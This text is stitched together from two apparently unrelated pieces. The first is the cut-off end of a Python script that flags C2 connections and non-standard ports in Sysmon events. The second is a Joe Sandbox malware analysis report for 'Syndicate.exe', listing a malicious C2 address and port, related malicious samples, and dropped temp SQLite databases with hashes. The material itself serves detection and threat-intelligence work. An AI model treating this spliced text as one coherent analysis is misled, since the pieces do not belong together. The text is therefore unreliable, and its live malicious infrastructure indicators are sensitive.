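{"EventID": 3, "Image": "C:\\Program Files\\WindowsApps\\Microsoft.XboxGamingOverlay_1.15.1001.0_x64__8wekyb3d8bbwe\\GameBar.exe", "ProcessId": 5572, "Protocol": "tcp", "Initiated": true, "SourceIp": "192.168.2.22", "SourcePort": 49740, "DestinationIp": "203.0.113.20", "DestinationPort": 443}
"""

if __name__ == "__main__":
    print(json.dumps(detect(SAMPLE_EVENTS), indent=2))
```

In production the second rule should also skip RFC 1918 destinations (internal services on odd ports are normal) and be joined with the process-creation event so that the alert carries the parent and the hash, but the shape stays the same: the C2 match is the high-confidence signal, the non-standard-port rule is what still fires once the operator moves to a new server.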
Simulations
Behavior and APIs
Time | Type | Description
11:46:16 | API Interceptor | 53x Sleep call for process: Syndicate.exe modified
Joe Sandbox View / Context
IPs
Match: 65.21.103.71
Associated Sample Name / URL | Detection | Context
RedFlame.exe | malicious | 65.21.103.71:56458/
RedFlame.exe | malicious | 65.21.103.71:56458/
Collapse.exe | malicious | 65.21.103.71:56458/
Collapse.exe | malicious | 65.21.103.71:56458/
Collapse.exe | malicious | 65.21.103.71:56458/
Collapse.exe | malicious | 65.21.103.71:56458/
Collapse.exe | malicious | 65.21.103.71:56458/
Domains
No context
ASN
Match: CP-ASDE
Associated Sample Name / URL | Detection | Context
RedFlame.exe | malicious | 65.21.103.71
RedFlame.exe | malicious | 65.21.103.71
F7HNqd2k7K.exe | malicious | 65.21.179.142
006mC7Oh77.exe | malicious | 65.21.179.142
Collapse.exe | malicious | 65.21.103.71
CSyG3zNcwS.exe | malicious | 65.21.181.5
BrCi5pJr8J.exe | malicious | 65.21.181.5
Collapse.exe | malicious | 65.21.103.71
Collapse.exe | malicious | 65.21.103.71
Collapse.exe | malicious | 65.21.103.71
jnl3kWNWWS.exe | malicious | 65.21.126.175
Collapse.exe | malicious | 65.21.103.71
4dee972756364c4a670b31004c506161750027588c111.exe | malicious | 65.21.122.45
fc8f7aa134b3771bf328e7d5aed9b7bdac2e0794c60a3.exe | malicious | 65.21.122.45
RKvaDjOIJz.exe | malicious | 65.21.122.45
ETlg6RunFK.exe | malicious | 65.21.122.45
16dd8a22b82372491d537d12f0a0574a3756d1a225994.exe | malicious | 65.21.122.45
b09e1e3ad712f773066bd497bb61406ff0c3f95746759.exe | malicious | 65.21.122.45
ujAvQrTk73.exe | malicious | 65.21.179.153
FoQGVXmWdZ.exe | malicious | 65.21.93.53
JA3 Fingerprints
No context
Dropped Files
No context
Created / dropped Files
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Syndicate.exe.log
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 2502
Entropy (8bit): 5.3347050065951125
Encrypted: false
SSDEEP: 48:MIHKx1qH2HKXRfHK7HKdHKBSTHaAHKzvRYHKhQnoPtHoxHImHKhBHKoHaHZHxLHL:PqxwWqXdq7qdqslqzJYqhQnoPtIxHbqQ
MD5: 9272E66A264F664A151C4A693A140914
SHA1: 31141E3FC38C5212EC068549E559A82D1D5B8F45
SHA-256: 0A658752FB253F23E57AF3E09E195170AF0D70C3BFD1292A8F9EC7ED116C0153
SHA-512: 008F9F89C03A81BE34FBD3E02F3A30C079CED196EEC80E61974D2A647534BF5A47913329E3686811F3C625596FDD4F8A49C5B8C75D42607001C5C1D33FE62220
Malicious: true
Reputation: low
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToke
C:\Users\user\AppData\Local\Temp\tmp46B2.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.792852251086831
Encrypted: false
SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5: 81DB1710BB13DA3343FC0DF9F00BE49F
SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious: false
Reputation: high, very likely benign file
Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmp46B3.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.792852251086831
Encrypted: false
SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5: 81DB1710BB13DA3343FC0DF9F00BE49F
SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious: false
Reputation: high, very likely benign file
Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmp7575.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.792852251086831
Encrypted: false
SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5: 81DB1710BB13DA3343FC0DF9F00BE49F
SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious: false
Reputation: high, very likely benign file
Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmpA466.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.792852251086831
Encrypted: false
SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5: 81DB1710BB13DA3343FC0DF9F00BE49F
SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious: false
Reputation: high, very likely benign file
Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmpA467.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.792852251086831
Encrypted: false
SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5: 81DB1710BB13DA3343FC0DF9F00BE49F
SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious: false
Reputation: high, very likely benign file
Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmpA468.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.792852251086831
Encrypted: false
SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5: 81DB1710BB13DA3343FC0DF9F00BE49F
SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious: false
Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmpA498.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.6970840431455908
Encrypted: false
SSDEEP: 24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5: 00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1: 14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256: 8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512: 159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious: false
Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmpA499.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.6970840431455908
Encrypted: false
SSDEEP: 24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5: 00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1: 14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256: 8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512: 159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious: false
Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmpD1D4.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmpD1D5.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmpD1F5.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmpD1F6.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmpD1F7.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmpD1F8.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmpD1F9.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmpD1FA.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmpD22A.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmpD22B.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmpD22C.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmpD22D.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmpF1B9.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.701188456968639
Encrypted: false
SSDEEP: 24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
MD5: 18A3248DC9C539CCD2C8419D200F1C4D
SHA1: 3B2CEE87F3426C4A08959E9861D274663420215C
SHA-256: 27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
SHA-512: F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
Malicious: false
Preview:
C:\Users\user\AppData\Local\Temp\tmpF1BA.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.6969712158039245
Encrypted: false
SSDEEP: 24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
MD5: 31CD00400A977C512B9F1AF51F2A5F90
SHA1: 3A6B9ED88BD73091D5685A51CB4C8870315C4A81
SHA-256: E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
SHA-512: 0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
Malicious: false
C:\Users\user\AppData\Local\Temp\tmpF1BB.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.702247102869977
Encrypted: false
SSDEEP: 24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
MD5: B734D7226D90E4FD8228EE89C7DD26DA
SHA1: EDA7F371036A56A0DE687FF97B01F355C5060846
SHA-256: ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
SHA-512: D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
Malicious: false
C:\Users\user\AppData\Local\Temp\tmpF1BC.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.6980379859154695
Encrypted: false
SSDEEP: 24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
MD5: 4E3F4BE1B97FA984F75F11D95B1C2602
SHA1: C34EB2BF97AB4B0032A4BB92B9579B00514DC211
SHA-256: 59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
SHA-512: DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
Malicious: false
C:\Users\user\AppData\Local\Temp\tmpF1BD.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.701188456968639
Encrypted: false
SSDEEP: 24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
MD5: 18A3248DC9C539CCD2C8419D200F1C4D
SHA1: 3B2CEE87F3426C4A08959E9861D274663420215C
SHA-256: 27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
SHA-512: F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
Malicious: false
C:\Users\user\AppData\Local\Temp\tmpF1BE.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.6969712158039245
Encrypted: false
